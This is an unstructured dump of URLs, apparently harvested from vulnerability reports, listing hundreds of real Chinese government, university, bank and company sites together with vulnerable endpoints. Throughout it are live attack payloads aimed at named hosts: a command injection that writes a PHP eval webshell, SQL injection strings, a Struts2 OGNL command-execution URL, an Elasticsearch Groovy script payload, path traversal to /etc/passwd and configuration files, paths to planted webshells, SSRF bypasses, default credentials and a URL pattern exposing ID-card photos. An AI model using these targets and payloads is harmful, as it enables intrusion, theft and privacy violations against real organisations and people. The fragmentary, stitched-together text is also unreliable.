inurl:cpzs.asp?ProClass= http://www.njrhlqkj.com//manage/message.asp http://www.njhpzkb.com//manage/message.asp http://njxiangyu.com//manage/message.asp http://www.hahjzs.com//manage/message.asp http://www.yhwxjy.cn//manage/message.asp http://www.njyll.cn//manage/message.asp http://www.xinfeng168.net//manage/message.asp http://ge.baidu.com/wse.tar http://ge.baidu.com/index.php/wse/callBack/DiffReCrawlCallBack/?evaluation_id=7072&taskId=7993&diff_num=1;echo%20xxx%27%3C?php%20eval%28$_POST[c]%29;?%3E%27%20%3E%20/home/work/wse-platform/bin/wse/x.php;echo%201%23 http://ge.baidu.com/index.php/wse/patchPageShow/contEvalPageShow?evaluation_id=111&label_env_id=111&query_name=aaa%27or%201=1%20limit%201%23 http://www.xiaodian.com/pc/download http://news.ename.cn/yumingjiaoyi_20150118_97290_1.html xiaodian.com/.cn http://www.xiaodian.com/h5/im/im?imver=1.2&name=mmmm&show_header=shop#chat/130oicm http://www.xiaodian.com/h5/im/im?imver=1.2&name=mmmm&show_header=shop#chat/130oicm 
http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career-online/sd_zjc_career_online_action.aspx?id=04fc0db8-f297-45fd-9cef-62dd2154a299 http://security.hnagroup.com http://security.hnagroup.com/wordpress/wp-login.php?redirect_to=http%3A%2F%2F114.251.242.148%2Fwordpress%2Fwp-admin%2Fpost-new.php http://security.hnagroup.com/网站360安全检测平台 http://webscan.360.cn/index/checkwebsite/url/security.hnagroup.com http://202.119.249.13 http://icourse.lygsf.cn http://221.224.254.234 http://202.119.160.175 http://202.119.160.175/selectCourseInfoOut.action http://221.1.104.11:8011/ExtWebModels/WebFront/ShowProduct.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowProduct.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowProduct.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowProduct.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowProduct.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowProduct.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowProduct.aspx?id= http://wooyun.org/bugs/wooyun-2015-091798中得ssrf可用短连接绕过。 http://widget.renren.com/dialog/share?resourceUrl=http://dwz.cn/CvchS http://daxue.renren-inc.com/bbs是discuz http://widget.renren.com/dialog/share?resourceUrl=http://dwz.cn/CvchS进行测试,发现漏洞存在但是没有我们想要的结果。 http://multimedia.tcl.com//WEB-INF/web.xml http://multimedia.tcl.com/WEB-INF/classes/log4j.properties http://multimedia.tcl.com/en//.svn/entries http://221.1.104.11:8011/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://www.ezwtj.gov.cn/readnews.aspx?nid=3822 http://pgzy.zjzs.net:8011/ashx/ajaxHandler.ashx 
http://pgzy.zjzs.net:8011/xnml/pic/savepic/33/01/05/1998/09/330105199809220011.jpg http://pgzy.zjzs.net:8011/xnml/pic/savepic/{身份证1-2位}/{身份证3-4位}/{身份证5-6位}/{身份证7-10位]/{身份证11-12位}/{完整身份证号}.jpg http://**.**.**/dbAdminsh/index.php_ http://portal.wangge.cc/api/index_v2.php?act=fetchsupinfo&gw_id=gw_yysx https://partner.maxthon.com https://partner.maxthon.com/index.php?keyword=&type_black=&type_white=Y https://partner.maxthon.com/black_list.php http://www.appstar.com.cn/ www.appstar.com.cn http://www.zsszyl.gov.cn/login/login.php http://www.appstar.com.cn http://www.appstar.com.cn/upload/itBook/2015010507709/it201503010048023471/word/J.jsp http://mail.156.cn/auth/reg1.action http://www.fahyyy.gov.cn/upload/ http://rtb.bitsmart.com.cn/ http://down.chinaz.com/soft/33546.htm http://www.morenedu.com/add_book.asp http://www.sibfi.com/add_book.asp http://siee.pzhu.cn/add_book.asp http://www.ldgsyy.com/add_book.asp http://www.sztmc.com/add_book.asp http://www.jskcedu.com/add_book.asp http://jwc.qdbhu.edu.cn/sy/add_book.asp http://61.134.38.38:8082/Svrs/Schedule.shtml http://61.134.38.38:8082/Svrs/Schedule.shtml http://221.181.248.2:8081/授权用户:淮安建设银行 http://112.24.101.142:8081/授权用户:建设银行江苏省分行 http://221.181.161.122:8081/授权用户:建设银行江苏省分行 http://221.131.71.210:8081/授权用户:中国移动通信集团江苏有限公司镇江分公司 http://112.21.184.154:8081/授权用户:常州建设银行 http://223.68.222.20:8081/授权用户:建设银行江苏省分行 http://env.bnu.edu.cn/mainview.php?cid=1&id=130%20and%201=1 http://env.bnu.edu.cn/mainview.php?cid=1&id=130%20and%201=2 http://www.ccgp-jiangsu.gov.cn http://218.94.38.180:7001/ http://www.ccgp-jiangsu.gov.cn:8081/carxygh/carSeach.do?car_manufacturers=122 http://licai.51credit.com//WEB-INF/web.xml http://licai.51credit.com//WEB-INF/classes/jdbc.properties http://zte.appstar.com.cn http://zte.appstar.com.cn/userlogin.action http://qjxy.hznu.edu.cn/oa/login.php http://user.pipi.cn/myMovsFirst.jsp?uid=15176 http://user.pipi.cn/myCommentsFirst.jsp?uid=9854177 http://drops.wooyun.org/tips/57 http://support.tcleu.com/admin/ 
m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0a12=12%0a%23 http://sppa.xju.edu.cn/shownews.asp?id=179 http://jck.tcl.com/ URL:http://jck.tcl.com/Trade/InfoCompanyNewsView.aspx?id=11 http://www.yichemall.com/ http://www.yichemall.com:80/ http://www.yichemall.com/ www.yichemall.com http://m.gwdang.com/.svn/entries http://dj.jmwjm.gov.cn/news.asp?keyword=1&imageField=88952634 http://www.tornadoweb.org/en/stable/web.html#tornado.web.Application)中可以得知: http://dzhcg.wuxi.gov.cn/homePage.action?action=webSiteIndex http://222.82.238.99:8080/login.html http://www.gxufl.com/jpkc/gxufl/search.asp http://dlx.lenovo.com/dlxsite/logon.aspx http://dlx.lenovo.com.cn/dlx3/DLX.RRS.Web/UI/Application/ResellerBasicInfo.aspx DLX.RRS.Web/ajax/DLX.RRS.Business.Access.AreaAccess,DLX.RRS.Business.ashx?_method=GetCityAreaDs&_session=r http://dlx.lenovo.com.cn http://www.dvripc.cn/ http://www.jiaju.com http://www.jiaju.com/o/trade/coupons/ www.jiaju.com https://github.com/zry656565/foundation/blob/a759eeeded14c29f2cc827588d121790585826ad/alipay/return_url.php http://tyxy.qhnu.edu.cn/news_detail.asp?id=428 www.csir.whu.edu.cn http://219.143.215.163/bjLottery/login.jsp http://219.143.215.163/bjLottery/assgin/viewLotterResult.action http://weixin.91160.com/ http://weixin.91160.com/index.php?c=find&a=index&site=0 http://weixin.91160.com http://219.143.118.86/ http://debug.moxian.com/key.php http://debug.moxian.com:8088/.svn/entries http://s22.jxqy.game.yy.com/phpmyadmin/ http://61.161.141.34/admin/login.jsp http://ip/video.3gp文件: www.cns.net.tw http://61.161.141.51/admin/login.jsp http://www.ztewelink.com http://www.ztewelink.com//FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.ztewelink.com/uploads/mu.asp 
http://bc.ifeng.com/c?db=ifeng&bid=16277,15962,3436&cid=2501,59,1&sid=33869&advid=349&camid=3546&show=ignore&url=http://jjhlhlhlkjh.4324554.bjyqttc.com http://www.eftimes.cn/ http://www.dingfeng-cn.com.cn/view_n.asp?id=101 http://www.kelaosi.com/view_n.asp?id=105 http://www.tjlingchuang.com/view_n.asp?id=157 http://www.novatj.com/view_n.asp?id=84 http://www.zytkt.com/view_n.asp?id=290 http://www.tjyidian.com/view_n.asp?id=177 http://www.lzycup.com/view_n.asp?id=87 http://www.ls-zy.com/view_n.asp?id=75 http://www.sunweikeji.com/view_n.asp?id=85 http://www.richu888.com/view_n.asp?id=205 http://www.ysjq.net/view_n.asp?id=78 http://www.lipin688.com/view_n.asp?id=79 http://www.tjzubai.com/view_n.asp?id=461 http://www.tianjinyingdong.com/view_n.asp?id=72 http://www.qifanedu.com/view_n.asp?id=384 http://www.anshunxin.com/view_n.asp?id=76 http://www.tjshdk.com/view_n.asp?id=97 http://www.anshunxin.com/view_n.asp?id=75 http://www.nxrmyy.com/View_N.asp?id=977 http://www.fanucweixiu.com/view_n.asp?id=82 http://www.taihonggroup.com/view_n.asp?id=319 http://www.yehis.com/view_n.asp?id=101 http://www.tjydy.com.cn/view_n.asp?id=80 http://www.junhuadianzi.com/view_n.asp?id=79 http://www.tjsbstud.com/view_n.asp?id=77 http://www.tjsjyh.cn/view_n.asp?id=78 http://www.hkwanshida.com/view_n.asp?id=118 http://www.fanucweixiu.com/view_n.asp?id=95 http://www.beihaoshengwu.com/view_n.asp?id=107 http://www.hzasyd.net/view_n.asp?id=79 http://www.qlyingxiang.com/qlhtml/view_n.asp?id=113 http://www.dafeng-medical.com/view_n.asp?id=75 http://www.lvdanban.net/view_n.asp?id=125 http://www.tjzhineng.net/view_n.asp?id=75 http://www.tjxwhb.com/view_n.asp?id=167 http://www.sanzuobiao.net/view_n.asp?id=24&cid=4 http://www.nxfb.com/View_N.asp?id=4 https://github.com/fujinwen/InfoRegent/blob/master/index.html http://59.33.249.55/ http://www.mobiportal.cn/ http://portal.landray.com.cn/ http://www.mlandray.com/ http://weixincs.heungkong.com/ http://61.144.246.189/ http://email.maduqi.com/ 
http://bbs.konka.com/ http://wx.rongchain.com/mobile.php?act=module&from_user=22&name=icard&do=manageaddress&weid=5 http://sec.chinabyte.com/157/13173657.shtml https://community.qualys.com/blogs/securitylabs/2014/12/08/poodle-bites-tls http://eip.tcl.com/phones/login.aspx http://locc.vipshop.com/test http://locc.vipshop.com/js/user-index.js http://locc.vipshop.com/user/数字 http://locc.vipshop.com/user/1.json www.skcoo.com)运维管理不当, http://210.21.119.232:804/ http://mail.ccfda.gov.cn/admin/sys/login.do http://www.phpmps.com/demo/data/com/thumb/20150104iaoydj.php www.707070.cn https://sslvpn.sinopec.com/ http://zhbg.hda.gov.cn/spsp/userreg/userReg!toRegPage.do WebPath:/apps/zhpt/resin-3.1.0/webapps/spsp/ http://www.xxxx.com/download/*.asp http://www.xxxx.com/upload/*.asp http://kczx.sus.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.sjtu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.sbs.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.shnu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.bjmu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://jiaohu.buaa.edu.cn/G2S//AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.njau.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.scu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://e-learning.ecust.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://course.ujn.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.xhu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://www.course.sdu.edu.cn/G2S//AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.shupl.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.hebut.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.sus.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx 
http://kczx.sus.edu.cn/download/86b330d8-9f70-4d59-8720-dd9d9da18b0a.asp http://kczx.xhu.edu.cn/G2S//AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.xhu.edu.cn/upload/08292dc8-bc57-4d6d-9e36-e3a980d74cf6.asp http://kczx.sus.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.sjtu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.sbs.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.shnu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.bjmu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://jiaohu.buaa.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.njau.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.scu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://e-learning.ecust.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://course.ujn.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.xjtu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.xhu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://www.course.sdu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.shupl.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.hebut.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://jxzx.bucea.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://course.hzau.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.sus.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.sus.edu.cn/download/51b85509-4dc4-4ea1-b5f2-b4d55725fd94.asp http://passport.lagou.com/login/login.html?ts=1425278729631&serviceId=lagou&service=http%253A%252F%252Fwww.lagou.com%252F&action=login&signature=B1CD5CF2DF1B41FF17504FA216925B84 http://m.yiqifei.com/user/blog/Edit.aspx?r= http://www.wooyun.org/bugs/wooyun-2015-099062/trace/dbd9d85ef5bc0a46eabb72709a5591cd http://www.luolai.com/company_news_detail.php?id=156 www.luolai.com/admin/privilege.php 
http://www.hbtycp.com/Search.aspx?key=11%u90095 http://apistore.baidu.com/astore/toolshttpproxy http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp http://117.40.187.175:8008/outportal/licenseManage/newLicenseManage.jsp http://wssp.jdz.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://xzfw.jinxi.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://wssp.lepingshi.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://xzfw.jxcr.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://120.203.196.20/outportal/licenseManage/newLicenseManage.jsp http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp cn:8008 http://wssp.jiangxi.gov.cn:8008 http://www.strongsoft.net/ ldfxb.com/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 yj.yywater.gov.cn/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 shzh.wlfx.gov.cn/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 shzh.dqwater.gov.cn/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 country:China user:admin pass:admin user:default pass:user user:888888 pass:admin user:666666 pass:user http://183.252.252.141:81/ http://183.245.118.62:8080/ http://183.250.45.121:8000/ http://183.250.27.60:81/ http://183.252.252.141:81/ http://183.248.200.2:8080/ http://218.10.65.235/highcomoa/homepage.nsf/FormWeb_Main1?openform http://lar.unicomgd.com/ http://b.unicomgd.com/ http://sla.unicomgd.com/ http://a.unicomgd.com/ http://d.unicomgd.com/ http://i.unicomgd.com/ http://svn.hoolai.com/hoolai-video-frontend/applay http://svn.hoolai.com/hoolai-video-frontend http://58.221.14.206:8081/wsdg_nantong/index.php/profile/remind http://job.hunnu.edu.cn/index_department.php?gradyear=2015&self_action=1&action_code=0&dep_id=9&name_find= http://box.lenovo.com/index.html https://box.lenovo.com/v1/team/list_by_id/34321*?with_member=false&page_num=0&_=1425219541549&account_id=143661&uid=200157 
http://gte.cnoocgas.com:8080/portal/login.jsp http://gte.cnoocgas.com:8080/portal/finduserlist.jsp?usercodelevel= http://demo.magicmail.com.cn:9988/演示邮箱用户名: http://10.1.157.64/maccms8_mfb/inc/ajax.php http://127.0.0.1/asd.html,修复时容易出现的获取host时以/分割来确定host。 http://abc@127.0.0.1/这样绕过。例如: www.10.0.0.1.xip.io http://tp.chinaso.com/web?url=http://www.10.10.0.179.xip.io&fr=client http://widget.renren.com/dialog/share?resourceUrl=http://www.10.10.16.224.xip.io http://share.renren.com/share/buttonshare.do?link=http://www.10.10.16.224.xip.io http://note.youdao.com/memory/?url=http://www.10.120.182.20aaa.xip.io http://qing.blog.sina.com.cn/blog/controllers/share.php?url=www.127.0.0.1.xip.io/asd.html http://www.strongsoft.net/ ldfxb.com/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 yj.yywater.gov.cn/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 shzh.wlfx.gov.cn/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 shzh.dqwater.gov.cn/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 http://gte.cnoocgas.com:8080/invoker/JMXInvokerServlet index.php/stat/clickStat http://scc.whut.edu.cn/ http://www.strongsoft.net/ ldfxb.com/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 yj.yywater.gov.cn/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 shzh.wlfx.gov.cn/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 shzh.dqwater.gov.cn/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 http://loudong.360.cn/vul/info/qid/QTVA-2015-181718 http://www.bzagri.gov.cn/More.asp?BigID=49&SmallID=66 http://www.bztc.gov.cn/More.asp?BigID=1&SmallID=2 http://www.pcny.gov.cn/More.asp?BigID=49&SmallID=66 http://pcsf.bzdc.cn/More.asp?BigID=1&SmallID=2 http://www.tjxwsj.cn/More.asp?BigID=49&SmallID=66 http://www.pcny.gov.cn/More.asp?BigID=1&SmallID=2 http://www.tjxyjj.cn/More.asp?BigID=49&SmallID=66 
http://www.bzsglj.cn/More.asp?BigID=1&SmallID=2 http://www.scpcgt.gov.cn/More.asp?BigID=49&SmallID=66 http://www.bzqtzb.com/More.asp?BigID=1&SmallID=2 http://mis.trip8080.com有s2-016漏洞 http://mis.trip8080.com/station/rand.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream http://www.trip8080.com/5ac73da4824100ac52100d7577aa8fae.html encap:Ethernet E4:1F:13:68:DC:60 addr:172.19.0.31 Bcast:172.19.0.255 Mask:255.255.255.0 e61f:13ff:fe68:dc60/64 Scope:Link MTU:1500 packets:4282524440 errors:36366664 dropped:36376895 frame:36366664 packets:5406440041 txqueuelen:1000 http://shuntian.hezuo.trip8080.com/invoker/EJBInvokerServlet http://www.strongsoft.net/ ldfxb.com/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 yj.yywater.gov.cn/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 shzh.wlfx.gov.cn/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 shzh.dqwater.gov.cn/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 http://lwzb.gdstats.gov.cn/bjstat_web/webtb/reportlistentry.do?yhid=770986785%27# http://www.xj96566.com/IOC/thread/business!getBossUserData.action?cardnum=4111681000 http://cii.cup.edu.cn/test.txt http://cii.cup.edu.cn/shl.asp;jpg http://www.gzyydz.com/classnews.asp?News_Class=%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E http://jmoa.183.gd.cn/zhenghe/AnnounceMore.aspx?type=1 http://www.xj96566.com/upload/template/dean_xiaomi130903/point/ http://www.xj96566.com/upload/images/upload/ http://www.xj96566.com/upload/point_tmp_input.php http://www.xj96566.com/upload/images/upload/creative/a.php http://www.xj96566.com/upload/images/upload/creative/b.php http://www.xj96566.com/upload/plugin.php?id=levaward%3Aaward&doingid=10 http://220.191.208.55/p01/login!doLogin.action http://220.180.89.90:8081/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://dydl.sddylib.com/userlogin.aspx 
http://ggg.360elib.com/userlogin.aspx http://221.1.218.166:81/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://218.23.126.222:999/userlogin.aspx http://60.170.103.21:81/userlogin.aspx http://zslib.org:8000/userlogin.aspx http://211.141.185.166:82/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://book.gyxtsg.org/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://220.180.89.90:8081/userlogin.aspx http://www.tlzxx.net/tushu/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://221.1.218.166:81/userlogin.aspx为例: http://221.1.218.166:81 http://www.zhanchengkeji.com/admin/ http://acm.hdu.edu.cn/compare.php?action=compare http://www.xipute.com/About.asp?id=7 http://www.dyhfdz.com/About.asp?id=7 http://www.js-huarong.com/About.asp?id=1 http://jsshenya.com/About.asp?id=1 http://www.jsdanxiang.com/About.asp?id=2 http://www.js-enor.com/About.asp?id=1 http://dyxinchao.com/About.asp?id=1 http://www.jschangyue.com/About.asp?id=1 http://221.179.35.18/g3photo.war http://221.179.35.18/g3photo.tar.gz http://u.languang.com/ http://price.zol.com.cn/article/price_down.shtml https://202.108.103.187/ http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx com:11324 http://www.zzcredit.gov.cn/ http://www.zzcredit.gov.cn/ShowNews?GROUPPATH=tzgg&GUID=B37ADC34-A9A0-4926-A03F-5F39C5AAC433 http://weixin.cbtn.tv:8080/yicai/ http://221.232.143.98/web/device/login?lang=1可以看出是采用h3c的解决方案 http://221.232.143.98:1001/Clt_trq/loginSum.action http://lincoln.youku.com/pma/ https://admin.xianji.game.yy.com问题站 http://bbs.uc.cn/kg/这里自定义图片,可以任意上传。 http://218.106.133.136/ http://218.106.133.136/companycase/SelectPer.aspx http://www.hunanzx.gov.cn:8080/sqmy/user!loguserinfo.action http://fanxian.egou.com/myegoufindaddress.do?id=3550500 http://fanxian.egou.com/myegoufindaddress.do?id=3550222 http://fanxian.egou.com/myegoufindaddress.do?id=3550111 
www.hebei-huafeng.com http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx http://demo.lebi.cn/onlinepay/95epay/PayResult.aspx https://hr.minshengec.cn/hrss/login.jsp cn:443 https://hr.minshengec.cn http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/ http://**.**.**/other/SppointmentExcelLogon.aspx http://vico1.vw.com.cn/other/eos_excel.aspx http://**.**.**/newcms/orm/index.aspx https://gems.haier.net/gems/security/loginInit.action?request_locale=en_US http://119.255.46.18:8081/ http://121.9.230.130:8086/ http://183.234.48.155:8086/ www.chinabank.com.cn/download/download.jsp?name=../../../../../../../../../../etc/passwd http://jas.hkbu.edu.hk/page.php?c=1&id=103 http://zone.wooyun.org/content/17605 http://219.216.227.196:8089/LibrarySite/index.action http://www.sheratongrandetaipei.com.tw/restaurant_content.php?id=5 http://www.ipe.org.cn/gca/Page2.aspx?shangshicode=000155 www.ckide.com/PHPWind/upload/mode.php?m=o http://www.sheratongrandetaipei.com.tw/accommodation_content.php?id=12 http://www.sheratongrandetaipei.com.tw/restaurant_content.php?id=3 http://www.sheratongrandetaipei.com.tw/event_content.php?id=83 http://www.sheratongrandetaipei.com.tw/news_content.php?id=27 http://www.sheratongrandetaipei.com.tw/occasions_content.php?id=5 http://www.wysxzfw.gov.cn/portal/new/content.jsp?id=20120106-935E1E4D586DBA408B54-11 http://cc.yundasys.com:8087/callcenter_new/popedom/userExit.action http://211.151.121.183:9200,根据厂商交流发现,ip是世纪互联的(见 http://211.151.121.183:9200/_plugin/head/ http://www.byqzxyy.com/info.php?id=2 http://www.byqzxyy.com/info.php?id=1 http://www.ykjwjdz.gov.cn/jzgl/info.php?id=2 http://www.limin-group.com/info.php?id=1 http://www.ykbwg.com/info.php?id=1 http://www.liaobin.com/info.php?id=6 http://www.kzsny.com/info.php?id=3 http://www.ndkpiano.com/info.php?id=2 http://www.ykshydl.com/info.php?id=1 http://www.sycb.cc/info.php?id=3 http://www.lnshbz.com/info.php?id=6 http://www.ykrunda.com/info.php?id=2 http://www.jzbyk.com/info.php?id=1 
http://www.yktdba.net/info.php?id=1 http://www.ykdrsb.com/info.php?id=2 http://www.ykhzcc.com/info.php?id=1 http://www.ykhaitong.com/info.php?id=11 http://www.ykgljx.com/info.php?id=1 http://www.ykeast.com/info.php?id=1 http://www.yksfdc.com/info.php?id=4 http://oa.shufesp.com:8080/vmain/login.jsp http://oa.shufesp.com:8080/ServiceAction/com.velcro.base.DataAction?sql= http://oa.shufesp.com:8080/ServiceAction/com.velcro.base.DataAction?sql=select/**/@@VERSION url:http://www.ase.cn,后台登陆页面存在sql注入漏洞。 http://think.lenovo.com.cn/ http://think.lenovo.com.cn/stations/Api/QueryMap.ashx?area=0451&type=ThinkPad http://serviceshop.lenovo.com.cn/ http://183.224.69.18/Details.aspx http://www.jljl.lss.gov.cn/news_listall.asp?kind= http://27.223.70.11/ http://27.223.70.11/ http://member.aili.com http://mcbbs.kuaikuai.cn/uc_server http://**.**.**/login.jsp http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../e/config/config.php http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../myphp/skc/skc_admin/config_base.php http://218.57.170.90:8080和http://218.57.170.90:6666/ http://itams.com.cn/ http://www.ptsn.net.cn/standard/std_query/show.php?source=yd&id=4425 http://tyb.njupt.edu.cn/ http://student.thestandard.com.hk/junior/ls_content_vpdf.asp?t=1&id=226 http://www.kaiyuan.eu/ http://www.kaiyuan.eu/ http://www.kaiyuan.eu/ http://lenovobbs.lcf5.lenovo.com.cn/test.php www.wowsai.com/index.php?act=ajax&app=cart&fun=get_activity_goods&id=1 http://ctx.wanda.cn/wanda/feedback http://ctx.wanda.cn/wanda/upload/test1.jspx http://gs.bnet.cn/ http://202.100.80.9/u-portal/ http://202.100.80.9/u-portal/ajax/reflexes!reflex.do http://debug.baozoumanhua.com:9200/_search?source=%7B%0A%22size%22%3A1%2C%0A%22script_fields%22%3A%20%7B%0A%20%20%20%20%22lupin%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%22script%22%3A%20%22java.lang.Math.class.forName%28%5C%22java.lang.Runtime%5C%22%29%22%2C%22lang%22%3A%22groovy%22%0A%20%20%20%20%7D%0A%20%7D%0A%7D 
http://114.112.174.170/serviceAct/saveUseLong.action http://www.kuaidi100.com/query?id=1&postid=300003849895&temp=0.8066521694418043&type=quanfengkuaidi&valicode= https://116.228.218.6/AuditSec/system/findPassword.action http://www.nxdns.net/Case/list_1.html http://www.nxdbn.cn/UploadFaceOK.asp http://www.nxeca.org/UploadFaceOK.asp http://www.nxbaoan.cn/UploadFaceOK.asp http://www.zgxzl.cn/UploadFaceOK.asp http://www.nxhdzy.cn/UploadFaceOK.asp http://byshfw.com/UploadFaceOK.asp http://xn--xhqu8ssqguo6c.com/UploadFaceOK.asp http://www.ynsmb.gov.cn/UploadFaceOK.asp http://xn--fiq06xs2bid.com/UploadFaceOK.asp http://ybgq.net/UploadFaceOK.asp http://www.nxhljz.cn/UploadFaceOK.asp http://www.west-china.net/hygf//UploadFaceOK.asp http://www.fzgc.lawtv.com.cn/Skins/Vedio.aspx?n_id=640&n_lx=10 http://www.sxlfajj.gov.cn/tNews_getAllChildCSZL.action http://www.chiscdc.com/ http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=1 http://221.230.140.60:8080//dwcx/grdetail.asp?bhkidx=1 http://218.93.201.187:8888/dwcx/grdetail.asp?bhkidx=1 http://221.230.8.231:8081//dwcx/grdetail.asp?bhkidx=1 http://222.184.250.2:8001//dwcx/grdetail.asp?bhkidx=1 http://www.shhgzf.com:8280/dwcx/ http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=1为例:上海市化工职业病防治为例 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10076 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10077 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10078 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10079 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10080 http://**.**.**/Manager.html http://youxuan.homeinns.com/ http://120.197.89.193/ http://120.197.89.193/WEB-INF/web.xml http://120.197.89.193/WEB-INF/classes/applicationContext.xml 